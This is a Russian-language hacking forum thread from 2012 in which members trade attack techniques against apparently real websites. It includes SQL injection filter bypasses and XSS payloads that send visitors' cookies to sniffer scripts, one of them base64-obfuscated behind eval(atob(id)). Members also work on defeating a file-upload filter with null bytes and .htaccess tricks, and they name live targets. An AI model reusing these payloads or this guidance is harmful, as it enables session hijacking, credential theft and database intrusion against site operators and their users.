Старый 24.09.2012, 19:55   #2381
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

Цитата:
Сообщение от Consistent Посмотреть сообщение
Подскажите, как обойти. Фильтруется символ _ в information_schema.columns\tables
Выдает ошибку

Error No: 1064 - MySQL error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\_schema.tables-- %'' at line 1

5.5.27-log
/*!information_schema*/.tables
/*!information_schema.tables*/
aspi вне форума   Ответить с цитированием
Старый 24.09.2012, 19:56   #2382
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

Цитата:
Сообщение от #Wolf# Посмотреть сообщение
Да, опечатался.


Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax


Тоже
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Any ideas?
значит делаешь гдето ошибку
aspi вне форума   Ответить с цитированием
Старый 24.09.2012, 20:55   #2383
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

aspi
Я пробовал так изначально. Не проходит, та же ошибка.

spari
No. Table with prefixes. And the prefix I do not know know can not either. I have to conclude, not to pick a table. So I have to bypass filtering. Your options do not approach me, I'm sorry. =)
Consistent вне форума   Ответить с цитированием
Старый 25.09.2012, 00:52   #2384
v3r7
 
Регистрация: 23.09.2012
Сообщений: 12
Репутация: 0
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
v3r7,
Нормальное решение, так и должно быть. А в первом варианте не работало из-за невалидного тега:
Код:
<script src="http://127.0.0.1/my.net/14/sniff.php?cookie="+document.cookie;></script>
Но если надо именно как в первом варианте, см. в гугле по запросу "append script js". Или делайте document.write() вместе с этим тегом.

#Wolf#,
Показывайте линк.
Ок ,тогда у меня ещё вопрос. Почему решение работает в мозиле ,опере и ишаке,а в хроме отказывается, что они там такого намудрили не в курсе?что за защита от передачи куков или исполнения кода?
v3r7 вне форума   Ответить с цитированием
Старый 25.09.2012, 01:41   #2385
v3r7
 
Регистрация: 23.09.2012
Сообщений: 12
Репутация: 0
Question

Цитата:
Сообщение от v3r7 Посмотреть сообщение
Ок ,тогда у меня ещё вопрос. Почему решение работает в мозиле ,опере и ишаке,а в хроме отказывается, что они там такого намудрили не в курсе?что за защита от передачи куков или исполнения кода?
Вот почему например onmouseover=window.execScript(isNaN(q="http://snif/1.php?l="+document.cookie))<ну тут я так понял просто из-за знаков,этот экзек не любит всякие там кавычки> или onmouseover=javascript:alert(); не хотят работать, а вот onmouseover=prompt(document.cookie) и " onmouseover=javascriptrompt(89789) работает безо всяких проблем... очень интересно неужели именно эти "функции" отключили как то? не фильтруются вроде никак.. однако вставка хтмл тоже не хочет работать

+++
http://victim/index.php/%22%20onmouseover=window.open%28%27http://site/sniff.php%3Fcookie=%27%2Bdocument.cookie%29%20//%20%22

Вот оно решение проблемы, не проходили плюсы и вопросы...кроме этой функции и имэйдж есть ещё варианты? мне интересно?

Последний раз редактировалось v3r7; 25.09.2012 в 06:59..
v3r7 вне форума   Ответить с цитированием
Старый 27.09.2012, 12:47   #2386
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Встретилась на просторах рунета оригинальная бага:
http://lavart.su/examples'
Если приглядеться, то кажется возможно выполнить код, но все манипуляции к созданию собственного класса и закрытие остального php кода результата не дали.
Можно ли в данном случае выполнить php код, или это обычный баг ?
Сергей Бардюр вне форума   Ответить с цитированием
Старый 27.09.2012, 16:49   #2387
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от v3r7
Вот оно решение проблемы, не проходили плюсы и вопросы...кроме этой функции и имэйдж есть ещё варианты? мне интересно?
Зависит от конкретной ситуации. Вариантов много. Например такой:
"onmouseover="eval(atob(id))"id="KG5ldyBJbWFnZSgpK S5zcmM9Jy8vc2l0ZS9zbmlmZi5waHBceDNGY29va2llPScrZG9 jdW1lbnQuY29va2ll

Атрибут id содержит код в base64:
(new Image()).src='//site/sniff.php\x3Fcookie='+document.cookie
Символ '?' заменен на escape-последовательность '\x3F' чтобы при преобразовании в base64 не было символа '/'.

p.s.: в какой тег внедряется код и какие атрибуты есть в этом теге перед XSS?
M_script вне форума   Ответить с цитированием
Старый 28.09.2012, 17:28   #2388
v3r7
 
Регистрация: 23.09.2012
Сообщений: 12
Репутация: 0
Question фльтрация расширения upload файлов

Наткнулся на вот такой вот скрипт фильтрации при загрузке файлов, кислотный нолик не работает,загрузки вида php.txt воспринимаются как текст при любых раскладах... так не катит txt.....%00.php не могу также загрузить например ".htaccess" или ".htaccess txt" чтобы в нём прописать AddType application/x-httpd-php .txt ((( вот сам скрипт:

<script type="text/javascript">
(function(){var d=document.domain;while (true){try{var A=window.parent.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(1 ,"","", "Invalid type specified") ;</script>

надеюсь вы предложите более эффективные варианты
v3r7 вне форума   Ответить с цитированием
Старый 29.09.2012, 16:39   #2389
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Столкнулся с такой скулёй, походу придётся крутить error-based но что-то косячу.

Такое чувство что функция принимает число до первого пробела а остальное отбрасывает.

Помогите с реализацией. Кстати оба параметра уязвимы. В одном из них юзается лимит скорее всего.

Код:
_ttp://cha[antigoogle]t.marria[antigoogle]geagency-nataly.net/list.php?from=1&step=3
MQ = on
BigBear вне форума   Ответить с цитированием
Старый 29.09.2012, 16:44   #2390
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

v3r7

Удалите JS код с проверкой и отправьте форму заново. В опере так можно, если нет оперы, сформировать пост и отправить через аддон hackbar в ФФ. Ну или wget/curl консольно. На крайний случай написать html форму и локально её отправить. Или ПХП скриптом на сокетах/курле.
Но я уверен там не только на JS проверка.

BigBear
Цитата:
Такое чувство что функция принимает число до первого пробела а остальное отбрасывает.
На форуме есть беспробельные варианты.
b3 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot